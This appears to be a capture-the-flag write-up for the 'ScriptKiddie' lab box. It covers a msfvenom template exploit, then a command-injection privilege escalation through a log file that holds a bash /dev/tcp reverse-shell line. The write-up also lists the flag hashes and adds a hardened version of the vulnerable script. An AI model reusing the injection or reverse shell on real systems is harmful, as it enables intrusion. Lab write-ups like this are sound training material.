kedaegan.github.io

ScriptKiddie

## Enumeration

Ports and Services

Software Installed:

Website:

Nmap Scan Results:

Initial Foothold

The payloads tool uses msfvenom; version unknown.
There is an exploit, https://www.exploit-db.com/exploits/49491, that lets you inject commands through a template file.

Used msfconsole to generate a custom apk file:

Uploaded it into the payload section and received a shell:

User.txt Proof Screenshot

User.txt Contents
be9a8fa46d406c5bb5e4452d76f539dd

Notes:
Created an SSH keypair, uploaded id_rsa.pub to the local user's authorized_keys, and SSHed in.

Privilege Escalation

Script in /home/pwn called scanlosers.sh:
It looks like it pulls entries from a log file called hackers in the kid directory and runs nmap against each one.

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

As user kid:

echo " test   ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.54/7777 0>&1' #" >> hackers
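
The injection above works because scanlosers.sh interpolates each log field into an `sh -c` string, and kid can write to that log. A hardened form of the loop follows as an added example; it is not code from the box or from this write-up, and the function names and constructed sample log lines are assumptions:

```sh
#!/bin/sh
# Added example (not the box's script): the scanlosers.sh loop with validation.

# Succeed only for a dotted-quad IPv4 address with every octet in 0-255.
is_ipv4() (
    addr=$1
    case "$addr" in
        ''|*[!0-9.]*|.*|*.|*..*) exit 1 ;;   # empty, non digit/dot, stray dots
    esac
    IFS=.
    set -- $addr                             # split on dots into $1..$n
    [ "$#" -eq 4 ] || exit 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] || exit 1
        [ "$octet" -le 255 ] || exit 1
    done
    exit 0
)

# Print the unique, validated targets from the log; report the rest on stderr.
safe_targets() {
    cut -d' ' -f3- "$1" | sort -u | while IFS= read -r ip; do
        if is_ipv4 "$ip"; then
            printf '%s\n' "$ip"
        else
            printf 'rejected log entry: %s\n' "$ip" >&2
        fi
    done
}

# Scan validated targets only. nmap receives the address as a single quoted
# argument, so nothing from the log is ever re-parsed by a shell.
scan_targets() {
    mkdir -p recon
    safe_targets "$1" | while IFS= read -r ip; do
        nmap --top-ports 10 -oN "recon/${ip}.nmap" "$ip" >/dev/null 2>&1 &
    done
}

# Demo on a constructed log: one normal entry, one injection-shaped entry.
demo_log=$(mktemp)
printf '%s\n' '[2021-02-03 10:00:00] 10.10.10.5' ' test   ;id #' > "$demo_log"
safe_targets "$demo_log"    # stdout: 10.10.10.5, stderr: the rejected entry
rm -f "$demo_log"
```

Validation closes the injection, but the script still runs as pwn on a file kid controls; restricting write access to the log removes the cross-user trust as well.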

Received a shell as pwn:

User pwn has NOPASSWD sudo on msfconsole:

Ran msfconsole with sudo and received a root shell.

Root Screenshot Here:


Root.txt Contents:
86301814fac8669d573182b79117d51b